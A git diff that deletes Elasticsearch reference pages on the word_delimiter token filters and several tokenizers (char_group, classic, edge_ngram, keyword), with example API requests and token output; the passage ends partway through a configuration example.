- -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "keyword", - "filter": [ "my_custom_word_delimiter_graph_filter" ] - } - }, - "filter": { - "my_custom_word_delimiter_graph_filter": { - "type": "word_delimiter_graph", - "type_table": [ "- => ALPHA" ], - "split_on_case_change": false, - "split_on_numerics": false, - "stem_english_possessive": true - } - } - } - } -} ----- - -[[analysis-word-delimiter-graph-differences]] -==== Differences between `word_delimiter_graph` and `word_delimiter` - -Both the `word_delimiter_graph` and -<> filters produce tokens -that span multiple positions when any of the following parameters are `true`: - - * <> - * <> - * <> - * <> - -However, only the `word_delimiter_graph` filter assigns multi-position tokens a -`positionLength` attribute, which indicates the number of positions a token -spans. This ensures the `word_delimiter_graph` filter always produces valid -<>. - -The `word_delimiter` filter does not assign multi-position tokens a -`positionLength` attribute. This means it produces invalid graphs for streams -including these tokens. - -While indexing does not support token graphs containing multi-position tokens, -queries, such as the <> query, can -use these graphs to generate multiple sub-queries from a single query string. - -To see how token graphs produced by the `word_delimiter` and -`word_delimiter_graph` filters differ, check out the following example. - -.*Example* -[%collapsible] -==== - -[[analysis-word-delimiter-graph-basic-token-graph]] -*Basic token graph* - -Both the `word_delimiter` and `word_delimiter_graph` produce the following token -graph for `PowerShot2000` when the following parameters are `false`: - - * <> - * <> - * <> - * <> - -This graph does not contain multi-position tokens. All tokens span only one -position. - -image::images/analysis/token-graph-basic.svg[align="center"] - -[[analysis-word-delimiter-graph-wdg-token-graph]] -*`word_delimiter_graph` graph with a multi-position token* - -The `word_delimiter_graph` filter produces the following token graph for -`PowerShot2000` when `catenate_words` is `true`. - -This graph correctly indicates the catenated `PowerShot` token spans two -positions. - -image::images/analysis/token-graph-wdg.svg[align="center"] - -[[analysis-word-delimiter-graph-wd-token-graph]] -*`word_delimiter` graph with a multi-position token* - -When `catenate_words` is `true`, the `word_delimiter` filter produces -the following token graph for `PowerShot2000`. - -Note that the catenated `PowerShot` token should span two positions but only -spans one in the token graph, making it invalid. - -image::images/analysis/token-graph-wd.svg[align="center"] - -==== diff --git a/docs/reference/analysis/tokenfilters/word-delimiter-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/word-delimiter-tokenfilter.asciidoc deleted file mode 100644 index c65dade6272..00000000000 --- a/docs/reference/analysis/tokenfilters/word-delimiter-tokenfilter.asciidoc +++ /dev/null @@ -1,382 +0,0 @@ -[[analysis-word-delimiter-tokenfilter]] -=== Word delimiter token filter -++++ -Word delimiter -++++ - -[WARNING] -==== -We recommend using the -<> instead of -the `word_delimiter` filter. - -The `word_delimiter` filter can produce invalid token graphs. See -<>. - -The `word_delimiter` filter also uses Lucene's -{lucene-analysis-docs}/miscellaneous/WordDelimiterFilter.html[WordDelimiterFilter], -which is marked as deprecated. 
-==== - -Splits tokens at non-alphanumeric characters. The `word_delimiter` filter -also performs optional token normalization based on a set of rules. By default, -the filter uses the following rules: - -* Split tokens at non-alphanumeric characters. - The filter uses these characters as delimiters. - For example: `Super-Duper` -> `Super`, `Duper` -* Remove leading or trailing delimiters from each token. - For example: `XL---42+'Autocoder'` -> `XL`, `42`, `Autocoder` -* Split tokens at letter case transitions. - For example: `PowerShot` -> `Power`, `Shot` -* Split tokens at letter-number transitions. - For example: `XL500` -> `XL`, `500` -* Remove the English possessive (`'s`) from the end of each token. - For example: `Neil's` -> `Neil` - -[TIP] -==== -The `word_delimiter` filter was designed to remove punctuation from complex -identifiers, such as product IDs or part numbers. For these use cases, we -recommend using the `word_delimiter` filter with the -<> tokenizer. - -Avoid using the `word_delimiter` filter to split hyphenated words, such as -`wi-fi`. Because users often search for these words both with and without -hyphens, we recommend using the -<> filter instead. -==== - -[[analysis-word-delimiter-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the -`word_delimiter` filter to split `Neil's-Super-Duper-XL500--42+AutoCoder` -into normalized tokens using the filter's default rules: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "keyword", - "filter": [ "word_delimiter" ], - "text": "Neil's-Super-Duper-XL500--42+AutoCoder" -} ----- - -The filter produces the following tokens: - -[source,txt] ----- -[ Neil, Super, Duper, XL, 500, 42, Auto, Coder ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "Neil", - "start_offset": 0, - "end_offset": 4, - "type": "word", - "position": 0 - }, - { - "token": "Super", - "start_offset": 7, - "end_offset": 12, - "type": "word", - "position": 1 - }, - { - "token": "Duper", - "start_offset": 13, - "end_offset": 18, - "type": "word", - "position": 2 - }, - { - "token": "XL", - "start_offset": 19, - "end_offset": 21, - "type": "word", - "position": 3 - }, - { - "token": "500", - "start_offset": 21, - "end_offset": 24, - "type": "word", - "position": 4 - }, - { - "token": "42", - "start_offset": 26, - "end_offset": 28, - "type": "word", - "position": 5 - }, - { - "token": "Auto", - "start_offset": 29, - "end_offset": 33, - "type": "word", - "position": 6 - }, - { - "token": "Coder", - "start_offset": 33, - "end_offset": 38, - "type": "word", - "position": 7 - } - ] -} ----- -//// - -[analysis-word-delimiter-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`word_delimiter` filter to configure a new -<>. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "keyword", - "filter": [ "word_delimiter" ] - } - } - } - } -} ----- - -[WARNING] -==== -Avoid using the `word_delimiter` filter with tokenizers that remove punctuation, -such as the <> tokenizer. This could -prevent the `word_delimiter` filter from splitting tokens correctly. It can also -interfere with the filter's configurable parameters, such as `catenate_all` or -`preserve_original`. We recommend using the -<> or -<> tokenizer instead. 
-==== - -[[word-delimiter-tokenfilter-configure-parms]] -==== Configurable parameters - -`catenate_all`:: -+ --- -(Optional, Boolean) -If `true`, the filter produces catenated tokens for chains of alphanumeric -characters separated by non-alphabetic delimiters. For example: -`super-duper-xl-500` -> [ `super`, **`superduperxl500`**, `duper`, `xl`, `500` -]. Defaults to `false`. - -[WARNING] -==== -When used for search analysis, catenated tokens can cause problems for the -<> query and other queries that -rely on token position for matching. Avoid setting this parameter to `true` if -you plan to use these queries. -==== --- - -`catenate_numbers`:: -+ --- -(Optional, Boolean) -If `true`, the filter produces catenated tokens for chains of numeric characters -separated by non-alphabetic delimiters. For example: `01-02-03` -> -[ `01`, **`010203`**, `02`, `03` ]. Defaults to `false`. - -[WARNING] -==== -When used for search analysis, catenated tokens can cause problems for the -<> query and other queries that -rely on token position for matching. Avoid setting this parameter to `true` if -you plan to use these queries. -==== --- - -`catenate_words`:: -+ --- -(Optional, Boolean) -If `true`, the filter produces catenated tokens for chains of alphabetical -characters separated by non-alphabetic delimiters. For example: `super-duper-xl` --> [ `super`, **`superduperxl`**, `duper`, `xl` ]. Defaults to `false`. - -[WARNING] -==== -When used for search analysis, catenated tokens can cause problems for the -<> query and other queries that -rely on token position for matching. Avoid setting this parameter to `true` if -you plan to use these queries. -==== --- - -`generate_number_parts`:: -(Optional, Boolean) -If `true`, the filter includes tokens consisting of only numeric characters in -the output. If `false`, the filter excludes these tokens from the output. -Defaults to `true`. - -`generate_word_parts`:: -(Optional, Boolean) -If `true`, the filter includes tokens consisting of only alphabetical characters -in the output. If `false`, the filter excludes these tokens from the output. -Defaults to `true`. - -`preserve_original`:: -(Optional, Boolean) -If `true`, the filter includes the original version of any split tokens in the -output. This original version includes non-alphanumeric delimiters. For example: -`super-duper-xl-500` -> [ **`super-duper-xl-500`**, `super`, `duper`, `xl`, -`500` ]. Defaults to `false`. - -`protected_words`:: -(Optional, array of strings) -Array of tokens the filter won't split. - -`protected_words_path`:: -+ --- -(Optional, string) -Path to a file that contains a list of tokens the filter won't split. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each token in the file must be separated by a line -break. --- - -`split_on_case_change`:: -(Optional, Boolean) -If `true`, the filter splits tokens at letter case transitions. For example: -`camelCase` -> [ `camel`, `Case` ]. Defaults to `true`. - -`split_on_numerics`:: -(Optional, Boolean) -If `true`, the filter splits tokens at letter-number transitions. For example: -`j2se` -> [ `j`, `2`, `se` ]. Defaults to `true`. - -`stem_english_possessive`:: -(Optional, Boolean) -If `true`, the filter removes the English possessive (`'s`) from the end of each -token. For example: `O'Neil's` -> [ `O`, `Neil` ]. Defaults to `true`. - -`type_table`:: -+ --- -(Optional, array of strings) -Array of custom type mappings for characters. 
This allows you to map -non-alphanumeric characters as numeric or alphanumeric to avoid splitting on -those characters. - -For example, the following array maps the plus (`+`) and hyphen (`-`) characters -as alphanumeric, which means they won't be treated as delimiters: - -`[ "+ => ALPHA", "- => ALPHA" ]` - -Supported types include: - -* `ALPHA` (Alphabetical) -* `ALPHANUM` (Alphanumeric) -* `DIGIT` (Numeric) -* `LOWER` (Lowercase alphabetical) -* `SUBWORD_DELIM` (Non-alphanumeric delimiter) -* `UPPER` (Uppercase alphabetical) --- - -`type_table_path`:: -+ --- -(Optional, string) -Path to a file that contains custom type mappings for characters. This allows -you to map non-alphanumeric characters as numeric or alphanumeric to avoid -splitting on those characters. - -For example, the contents of this file may contain the following: - -[source,txt] ----- -# Map the $, %, '.', and ',' characters to DIGIT -# This might be useful for financial data. -$ => DIGIT -% => DIGIT -. => DIGIT -\\u002C => DIGIT - -# in some cases you might not want to split on ZWJ -# this also tests the case where we need a bigger byte[] -# see https://en.wikipedia.org/wiki/Zero-width_joiner -\\u200D => ALPHANUM ----- - -Supported types include: - -* `ALPHA` (Alphabetical) -* `ALPHANUM` (Alphanumeric) -* `DIGIT` (Numeric) -* `LOWER` (Lowercase alphabetical) -* `SUBWORD_DELIM` (Non-alphanumeric delimiter) -* `UPPER` (Uppercase alphabetical) - -This file path must be absolute or relative to the `config` location, and the -file must be UTF-8 encoded. Each mapping in the file must be separated by a line -break. --- - -[[analysis-word-delimiter-tokenfilter-customize]] -==== Customize - -To customize the `word_delimiter` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a `word_delimiter` -filter that uses the following rules: - -* Split tokens at non-alphanumeric characters, _except_ the hyphen (`-`) - character. -* Remove leading or trailing delimiters from each token. -* Do _not_ split tokens at letter case transitions. -* Do _not_ split tokens at letter-number transitions. -* Remove the English possessive (`'s`) from the end of each token. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "keyword", - "filter": [ "my_custom_word_delimiter_filter" ] - } - }, - "filter": { - "my_custom_word_delimiter_filter": { - "type": "word_delimiter", - "type_table": [ "- => ALPHA" ], - "split_on_case_change": false, - "split_on_numerics": false, - "stem_english_possessive": true - } - } - } - } -} ----- diff --git a/docs/reference/analysis/tokenizers.asciidoc b/docs/reference/analysis/tokenizers.asciidoc deleted file mode 100644 index fa47c05e3a0..00000000000 --- a/docs/reference/analysis/tokenizers.asciidoc +++ /dev/null @@ -1,155 +0,0 @@ -[[analysis-tokenizers]] -== Tokenizer reference - -A _tokenizer_ receives a stream of characters, breaks it up into individual -_tokens_ (usually individual words), and outputs a stream of _tokens_. For -instance, a <> tokenizer breaks -text into tokens whenever it sees any whitespace. It would convert the text -`"Quick brown fox!"` into the terms `[Quick, brown, fox!]`. 
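A quick way to see this in action is the `_analyze` API. The following request is a minimal sketch of the example above, reusing the `whitespace` tokenizer and the text from the preceding paragraph:

[source,console]
---------------------------
POST _analyze
{
  "tokenizer": "whitespace",
  "text": "Quick brown fox!"
}
---------------------------

The response lists the three terms `[ Quick, brown, fox! ]`, each with its position and character offsets.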
- -The tokenizer is also responsible for recording the following: - -* Order or _position_ of each term (used for phrase and word proximity queries) -* Start and end _character offsets_ of the original word which the term -represents (used for highlighting search snippets). -* _Token type_, a classification of each term produced, such as ``, -``, or ``. Simpler analyzers only produce the `word` token type. - -Elasticsearch has a number of built in tokenizers which can be used to build -<>. - -[discrete] -=== Word Oriented Tokenizers - -The following tokenizers are usually used for tokenizing full text into -individual words: - -<>:: - -The `standard` tokenizer divides text into terms on word boundaries, as -defined by the Unicode Text Segmentation algorithm. It removes most -punctuation symbols. It is the best choice for most languages. - -<>:: - -The `letter` tokenizer divides text into terms whenever it encounters a -character which is not a letter. - -<>:: - -The `lowercase` tokenizer, like the `letter` tokenizer, divides text into -terms whenever it encounters a character which is not a letter, but it also -lowercases all terms. - -<>:: - -The `whitespace` tokenizer divides text into terms whenever it encounters any -whitespace character. - -<>:: - -The `uax_url_email` tokenizer is like the `standard` tokenizer except that it -recognises URLs and email addresses as single tokens. - -<>:: - -The `classic` tokenizer is a grammar based tokenizer for the English Language. - -<>:: - -The `thai` tokenizer segments Thai text into words. - -[discrete] -=== Partial Word Tokenizers - -These tokenizers break up text or words into small fragments, for partial word -matching: - -<>:: - -The `ngram` tokenizer can break up text into words when it encounters any of -a list of specified characters (e.g. whitespace or punctuation), then it returns -n-grams of each word: a sliding window of continuous letters, e.g. `quick` -> -`[qu, ui, ic, ck]`. - -<>:: - -The `edge_ngram` tokenizer can break up text into words when it encounters any of -a list of specified characters (e.g. whitespace or punctuation), then it returns -n-grams of each word which are anchored to the start of the word, e.g. `quick` -> -`[q, qu, qui, quic, quick]`. - - -[discrete] -=== Structured Text Tokenizers - -The following tokenizers are usually used with structured text like -identifiers, email addresses, zip codes, and paths, rather than with full -text: - -<>:: - -The `keyword` tokenizer is a ``noop'' tokenizer that accepts whatever text it -is given and outputs the exact same text as a single term. It can be combined -with token filters like <> to -normalise the analysed terms. - -<>:: - -The `pattern` tokenizer uses a regular expression to either split text into -terms whenever it matches a word separator, or to capture matching text as -terms. - -<>:: - -The `simple_pattern` tokenizer uses a regular expression to capture matching -text as terms. It uses a restricted subset of regular expression features -and is generally faster than the `pattern` tokenizer. - -<>:: - -The `char_group` tokenizer is configurable through sets of characters to split -on, which is usually less expensive than running regular expressions. - -<>:: - -The `simple_pattern_split` tokenizer uses the same restricted regular expression -subset as the `simple_pattern` tokenizer, but splits the input at matches rather -than returning the matches as terms. 
- -<>:: - -The `path_hierarchy` tokenizer takes a hierarchical value like a filesystem -path, splits on the path separator, and emits a term for each component in the -tree, e.g. `/foo/bar/baz` -> `[/foo, /foo/bar, /foo/bar/baz ]`. - - -include::tokenizers/chargroup-tokenizer.asciidoc[] - -include::tokenizers/classic-tokenizer.asciidoc[] - -include::tokenizers/edgengram-tokenizer.asciidoc[] - -include::tokenizers/keyword-tokenizer.asciidoc[] - -include::tokenizers/letter-tokenizer.asciidoc[] - -include::tokenizers/lowercase-tokenizer.asciidoc[] - -include::tokenizers/ngram-tokenizer.asciidoc[] - -include::tokenizers/pathhierarchy-tokenizer.asciidoc[] - -include::tokenizers/pattern-tokenizer.asciidoc[] - -include::tokenizers/simplepattern-tokenizer.asciidoc[] - -include::tokenizers/simplepatternsplit-tokenizer.asciidoc[] - -include::tokenizers/standard-tokenizer.asciidoc[] - -include::tokenizers/thai-tokenizer.asciidoc[] - -include::tokenizers/uaxurlemail-tokenizer.asciidoc[] - -include::tokenizers/whitespace-tokenizer.asciidoc[] diff --git a/docs/reference/analysis/tokenizers/chargroup-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/chargroup-tokenizer.asciidoc deleted file mode 100644 index 84a29dc5718..00000000000 --- a/docs/reference/analysis/tokenizers/chargroup-tokenizer.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[[analysis-chargroup-tokenizer]] -=== Character group tokenizer -++++ -Character group -++++ - -The `char_group` tokenizer breaks text into terms whenever it encounters a -character which is in a defined set. It is mostly useful for cases where a simple -custom tokenization is desired, and the overhead of use of the <> -is not acceptable. - -[discrete] -=== Configuration - -The `char_group` tokenizer accepts one parameter: - -[horizontal] -`tokenize_on_chars`:: - A list containing a list of characters to tokenize the string on. Whenever a character - from this list is encountered, a new token is started. This accepts either single - characters like e.g. `-`, or character groups: `whitespace`, `letter`, `digit`, - `punctuation`, `symbol`. - -`max_token_length`:: - The maximum token length. If a token is seen that exceeds this length then - it is split at `max_token_length` intervals. Defaults to `255`. - - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": { - "type": "char_group", - "tokenize_on_chars": [ - "whitespace", - "-", - "\n" - ] - }, - "text": "The QUICK brown-fox" -} ---------------------------- - -returns - -[source,console-result] ---------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "QUICK", - "start_offset": 4, - "end_offset": 9, - "type": "word", - "position": 1 - }, - { - "token": "brown", - "start_offset": 10, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "fox", - "start_offset": 16, - "end_offset": 19, - "type": "word", - "position": 3 - } - ] -} ---------------------------- diff --git a/docs/reference/analysis/tokenizers/classic-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/classic-tokenizer.asciidoc deleted file mode 100644 index f617fddb1bc..00000000000 --- a/docs/reference/analysis/tokenizers/classic-tokenizer.asciidoc +++ /dev/null @@ -1,263 +0,0 @@ -[[analysis-classic-tokenizer]] -=== Classic tokenizer -++++ -Classic -++++ - -The `classic` tokenizer is a grammar based tokenizer that is good for English -language documents. 
This tokenizer has heuristics for special treatment of -acronyms, company names, email addresses, and internet host names. However, -these rules don't always work, and the tokenizer doesn't work well for most -languages other than English: - -* It splits words at most punctuation characters, removing punctuation. However, a - dot that's not followed by whitespace is considered part of a token. - -* It splits words at hyphens, unless there's a number in the token, in which case - the whole token is interpreted as a product number and is not split. - -* It recognizes email addresses and internet hostnames as one token. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "classic", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "", - "position": 1 - }, - { - "token": "QUICK", - "start_offset": 6, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "Brown", - "start_offset": 12, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "Foxes", - "start_offset": 18, - "end_offset": 23, - "type": "", - "position": 4 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "", - "position": 5 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "", - "position": 6 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "", - "position": 7 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "", - "position": 8 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ The, 2, QUICK, Brown, Foxes, jumped, over, the, lazy, dog's, bone ] ---------------------------- - -[discrete] -=== Configuration - -The `classic` tokenizer accepts the following parameters: - -[horizontal] -`max_token_length`:: - - The maximum token length. If a token is seen that exceeds this length then - it is split at `max_token_length` intervals. Defaults to `255`. - -[discrete] -=== Example configuration - -In this example, we configure the `classic` tokenizer to have a -`max_token_length` of 5 (for demonstration purposes): - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "classic", - "max_token_length": 5 - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_analyzer", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." 
-} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "", - "position": 1 - }, - { - "token": "QUICK", - "start_offset": 6, - "end_offset": 11, - "type": "", - "position": 2 - }, - { - "token": "Brown", - "start_offset": 12, - "end_offset": 17, - "type": "", - "position": 3 - }, - { - "token": "Foxes", - "start_offset": 18, - "end_offset": 23, - "type": "", - "position": 4 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "", - "position": 6 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "", - "position": 7 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "", - "position": 8 - }, - { - "token": "dog's", - "start_offset": 45, - "end_offset": 50, - "type": "", - "position": 9 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "", - "position": 10 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ The, 2, QUICK, Brown, Foxes, jumpe, d, over, the, lazy, dog's, bone ] ---------------------------- diff --git a/docs/reference/analysis/tokenizers/edgengram-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/edgengram-tokenizer.asciidoc deleted file mode 100644 index 7bb66f3dd4d..00000000000 --- a/docs/reference/analysis/tokenizers/edgengram-tokenizer.asciidoc +++ /dev/null @@ -1,360 +0,0 @@ -[[analysis-edgengram-tokenizer]] -=== Edge n-gram tokenizer -++++ -Edge n-gram -++++ - -The `edge_ngram` tokenizer first breaks text down into words whenever it -encounters one of a list of specified characters, then it emits -{wikipedia}/N-gram[N-grams] of each word where the start of -the N-gram is anchored to the beginning of the word. - -Edge N-Grams are useful for _search-as-you-type_ queries. - -TIP: When you need _search-as-you-type_ for text which has a widely known -order, such as movie or song titles, the -<> is a much more efficient -choice than edge N-grams. Edge N-grams have the advantage when trying to -autocomplete words that can appear in any order. - -[discrete] -=== Example output - -With the default settings, the `edge_ngram` tokenizer treats the initial text as a -single token and produces N-grams with minimum length `1` and maximum length -`2`: - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "edge_ngram", - "text": "Quick Fox" -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "Q", - "start_offset": 0, - "end_offset": 1, - "type": "word", - "position": 0 - }, - { - "token": "Qu", - "start_offset": 0, - "end_offset": 2, - "type": "word", - "position": 1 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ Q, Qu ] ---------------------------- - -NOTE: These default gram lengths are almost entirely useless. You need to -configure the `edge_ngram` before using it. - -[discrete] -=== Configuration - -The `edge_ngram` tokenizer accepts the following parameters: - -`min_gram`:: - Minimum length of characters in a gram. Defaults to `1`. 
- -`max_gram`:: -+ --- -Maximum length of characters in a gram. Defaults to `2`. - -See <>. --- - -`token_chars`:: - - Character classes that should be included in a token. Elasticsearch - will split on characters that don't belong to the classes specified. - Defaults to `[]` (keep all characters). -+ -Character classes may be any of the following: -+ -* `letter` -- for example `a`, `b`, `ï` or `京` -* `digit` -- for example `3` or `7` -* `whitespace` -- for example `" "` or `"\n"` -* `punctuation` -- for example `!` or `"` -* `symbol` -- for example `$` or `√` -* `custom` -- custom characters which need to be set using the -`custom_token_chars` setting. - -`custom_token_chars`:: - - Custom characters that should be treated as part of a token. For example, - setting this to `+-_` will make the tokenizer treat the plus, minus and - underscore sign as part of a token. - -[discrete] -[[max-gram-limits]] -=== Limitations of the `max_gram` parameter - -The `edge_ngram` tokenizer's `max_gram` value limits the character length of -tokens. When the `edge_ngram` tokenizer is used with an index analyzer, this -means search terms longer than the `max_gram` length may not match any indexed -terms. - -For example, if the `max_gram` is `3`, searches for `apple` won't match the -indexed term `app`. - -To account for this, you can use the -<> token filter with a search analyzer -to shorten search terms to the `max_gram` character length. However, this could -return irrelevant results. - -For example, if the `max_gram` is `3` and search terms are truncated to three -characters, the search term `apple` is shortened to `app`. This means searches -for `apple` return any indexed terms matching `app`, such as `apply`, `snapped`, -and `apple`. - -We recommend testing both approaches to see which best fits your -use case and desired search experience. - -[discrete] -=== Example configuration - -In this example, we configure the `edge_ngram` tokenizer to treat letters and -digits as tokens, and to produce grams with minimum length `2` and maximum -length `10`: - -[source,console] ----------------------------- -PUT my-index-00001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "my_tokenizer" - } - }, - "tokenizer": { - "my_tokenizer": { - "type": "edge_ngram", - "min_gram": 2, - "max_gram": 10, - "token_chars": [ - "letter", - "digit" - ] - } - } - } - } -} - -POST my-index-00001/_analyze -{ - "analyzer": "my_analyzer", - "text": "2 Quick Foxes." 
-} ----------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "Qu", - "start_offset": 2, - "end_offset": 4, - "type": "word", - "position": 0 - }, - { - "token": "Qui", - "start_offset": 2, - "end_offset": 5, - "type": "word", - "position": 1 - }, - { - "token": "Quic", - "start_offset": 2, - "end_offset": 6, - "type": "word", - "position": 2 - }, - { - "token": "Quick", - "start_offset": 2, - "end_offset": 7, - "type": "word", - "position": 3 - }, - { - "token": "Fo", - "start_offset": 8, - "end_offset": 10, - "type": "word", - "position": 4 - }, - { - "token": "Fox", - "start_offset": 8, - "end_offset": 11, - "type": "word", - "position": 5 - }, - { - "token": "Foxe", - "start_offset": 8, - "end_offset": 12, - "type": "word", - "position": 6 - }, - { - "token": "Foxes", - "start_offset": 8, - "end_offset": 13, - "type": "word", - "position": 7 - } - ] -} ----------------------------- - -///////////////////// - -The above example produces the following terms: - -[source,text] ---------------------------- -[ Qu, Qui, Quic, Quick, Fo, Fox, Foxe, Foxes ] ---------------------------- - -Usually we recommend using the same `analyzer` at index time and at search -time. In the case of the `edge_ngram` tokenizer, the advice is different. It -only makes sense to use the `edge_ngram` tokenizer at index time, to ensure -that partial words are available for matching in the index. At search time, -just search for the terms the user has typed in, for instance: `Quick Fo`. - -Below is an example of how to set up a field for _search-as-you-type_. - -Note that the `max_gram` value for the index analyzer is `10`, which limits -indexed terms to 10 characters. Search terms are not truncated, meaning that -search terms longer than 10 characters may not match any indexed terms. - -[source,console] ------------------------------------ -PUT my-index-00001 -{ - "settings": { - "analysis": { - "analyzer": { - "autocomplete": { - "tokenizer": "autocomplete", - "filter": [ - "lowercase" - ] - }, - "autocomplete_search": { - "tokenizer": "lowercase" - } - }, - "tokenizer": { - "autocomplete": { - "type": "edge_ngram", - "min_gram": 2, - "max_gram": 10, - "token_chars": [ - "letter" - ] - } - } - } - }, - "mappings": { - "properties": { - "title": { - "type": "text", - "analyzer": "autocomplete", - "search_analyzer": "autocomplete_search" - } - } - } -} - -PUT my-index-00001/_doc/1 -{ - "title": "Quick Foxes" <1> -} - -POST my-index-00001/_refresh - -GET my-index-00001/_search -{ - "query": { - "match": { - "title": { - "query": "Quick Fo", <2> - "operator": "and" - } - } - } -} ------------------------------------ - -<1> The `autocomplete` analyzer indexes the terms `[qu, qui, quic, quick, fo, fox, foxe, foxes]`. -<2> The `autocomplete_search` analyzer searches for the terms `[quick, fo]`, both of which appear in the index. 
- -///////////////////// - -[source,console-result] ----------------------------- -{ - "took": $body.took, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.5753642, - "hits": [ - { - "_index": "my-index-00001", - "_type": "_doc", - "_id": "1", - "_score": 0.5753642, - "_source": { - "title": "Quick Foxes" - } - } - ] - } -} ----------------------------- -// TESTRESPONSE[s/"took".*/"took": "$body.took",/] -///////////////////// diff --git a/docs/reference/analysis/tokenizers/keyword-tokenizer.asciidoc b/docs/reference/analysis/tokenizers/keyword-tokenizer.asciidoc deleted file mode 100644 index c4ee77458d8..00000000000 --- a/docs/reference/analysis/tokenizers/keyword-tokenizer.asciidoc +++ /dev/null @@ -1,109 +0,0 @@ -[[analysis-keyword-tokenizer]] -=== Keyword tokenizer -++++ -Keyword -++++ - -The `keyword` tokenizer is a ``noop'' tokenizer that accepts whatever text it -is given and outputs the exact same text as a single term. It can be combined -with token filters to normalise output, e.g. lower-casing email addresses. - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "keyword", - "text": "New York" -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "New York", - "start_offset": 0, - "end_offset": 8, - "type": "word", - "position": 0 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following term: - -[source,text] ---------------------------- -[ New York ] ---------------------------- - -[discrete] -[[analysis-keyword-tokenizer-token-filters]] -=== Combine with token filters -You can combine the `keyword` tokenizer with token filters to normalise -structured data, such as product IDs or email addresses. - -For example, the following <> request uses the -`keyword` tokenizer and <> filter to -convert an email address to lowercase. - -[source,console] ---------------------------- -POST _analyze -{ - "tokenizer": "keyword", - "filter": [ "lowercase" ], - "text": "john.SMITH@example.COM" -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "john.smith@example.com", - "start_offset": 0, - "end_offset": 22, - "type": "word", - "position": 0 - } - ] -} ----------------------------- - -///////////////////// - - -The request produces the following token: - -[source,text] ---------------------------- -[ john.smith@example.com ] ---------------------------- - - -[discrete] -=== Configuration - -The `keyword` tokenizer accepts the following parameters: - -[horizontal] -`buffer_size`:: - - The number of characters read into the term buffer in a single pass. - Defaults to `256`. The term buffer will grow by this size until all the - text has been consumed. It is advisable not to change this setting. 
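If you do need to set `buffer_size` explicitly, it goes on a custom `keyword` tokenizer definition. The following request is an illustrative sketch only: the index, analyzer, and tokenizer names are made up, and the value shown is simply the default.

[source,console]
--------------------------------------------------
PUT keyword_buffer_example
{
  "settings": {
    "analysis": {
      "analyzer": {
        "my_keyword_analyzer": {
          "tokenizer": "my_keyword_tokenizer"
        }
      },
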